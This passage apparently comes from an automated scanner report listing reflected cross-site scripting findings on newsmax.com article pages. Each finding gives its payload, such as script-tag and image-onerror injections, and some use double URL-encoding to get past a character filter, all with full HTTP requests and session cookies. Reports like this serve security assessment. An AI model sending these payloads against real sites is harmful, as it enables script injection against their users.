Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45912
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Condi
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/0325499' a=b 13dbdb043e/18/id/389924'
class="article_tools_link">
...[SNIP]...

1.4. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 30ca2'%20a%3db%20db0bf94c2c9 was submitted in the REST URL parameter 5. This input was echoed as 30ca2' a=b db0bf94c2c9 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/1830ca2'%20a%3db%20db0bf94c2c9/id/389924 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45921
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Condi
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/1830ca2' a=b db0bf94c2c9/id/389924'
class="article_tools_link">
...[SNIP]...

1.5. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3562'%20a%3db%20219ba10a3f8 was submitted in the REST URL parameter 7. This input was echoed as e3562' a=b 219ba10a3f8 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924e3562'%20a%3db%20219ba10a3f8 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41321
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924e3562' a=b 219ba10a3f8'
class="article_tools_link">
...[SNIP]...

1.6. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a45d%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9f287766a11 was submitted in the REST URL parameter 7. This input was echoed as 4a45d"><img src=a onerror=alert(1)>9f287766a11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/3899244a45d%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9f287766a11 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41769
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href="javascript:printPage(3899244a45d"><img src=a onerror=alert(1)>9f287766a11);"
class="article_tools_link">
...[SNIP]...

1.7. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b2e"><script>alert(1)</script>6a58b4e89c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924?72b2e"><script>alert(1)</script>6a58b4e89c1=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46152
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Condi
...[SNIP]...
<a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924?72b2e"><script>alert(1)</script>6a58b4e89c1=1')"
class="article_tools_link">
...[SNIP]...

1.8. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b5eb'><script>alert(1)</script>04af1edded7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924?1b5eb'><script>alert(1)</script>04af1edded7=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46147
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Condi
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924?1b5eb'><script>alert(1)</script>04af1edded7=1'
class="article_tools_link">
...[SNIP]...

1.9. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64891'%20a%3db%2081688a489b9 was submitted in the REST URL parameter 2. This input was echoed as 64891' a=b 81688a489b9 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Bulimia-treatment-centers-symptoms64891'%20a%3db%2081688a489b9/2011/03/17/id/371701 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46364
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Bulim
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms64891' a=b 81688a489b9/2011/03/17/id/371701'
class="article_tools_link">
...[SNIP]...

1.10. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9c50'%20a%3db%20dd3ff6641cd was submitted in the REST URL parameter 3. This input was echoed as c9c50' a=b dd3ff6641cd in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011c9c50'%20a%3db%20dd3ff6641cd/03/17/id/371701 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46364
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Bulim
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011c9c50' a=b dd3ff6641cd/03/17/id/371701'
class="article_tools_link">
...[SNIP]...

1.11. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f968b'%20a%3db%206771464688f was submitted in the REST URL parameter 4. This input was echoed as f968b' a=b 6771464688f in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03f968b'%20a%3db%206771464688f/17/id/371701 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46364
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Bulim
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03f968b' a=b 6771464688f/17/id/371701'
class="article_tools_link">
...[SNIP]...

1.12. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5c87e'%20a%3db%2030e6dac8390 was submitted in the REST URL parameter 5. This input was echoed as 5c87e' a=b 30e6dac8390 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/175c87e'%20a%3db%2030e6dac8390/id/371701 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46364
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Bulim
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/175c87e' a=b 30e6dac8390/id/371701'
class="article_tools_link">
...[SNIP]...

1.13. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 288e0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e40508d0de2 was submitted in the REST URL parameter 7. This input was echoed as 288e0"><img src=a onerror=alert(1)>40508d0de2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701288e0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e40508d0de2 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41515
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href="javascript:printPage(371701288e0"><img src=a onerror=alert(1)>40508d0de2);"
class="article_tools_link">
...[SNIP]...

1.14. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 139d9'%20a%3db%20f3748a4328f was submitted in the REST URL parameter 7. This input was echoed as 139d9' a=b f3748a4328f in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701139d9'%20a%3db%20f3748a4328f HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41078
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701139d9' a=b f3748a4328f'
class="article_tools_link">
...[SNIP]...

1.15. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c7a7f'><script>alert(1)</script>5a04eb222fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701?c7a7f'><script>alert(1)</script>5a04eb222fb=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46586
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Bulim
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701?c7a7f'><script>alert(1)</script>5a04eb222fb=1'
class="article_tools_link">
...[SNIP]...

1.16. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae9b"><script>alert(1)</script>e60bdf8e5f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701?eae9b"><script>alert(1)</script>e60bdf8e5f5=1 HTTP/1.1
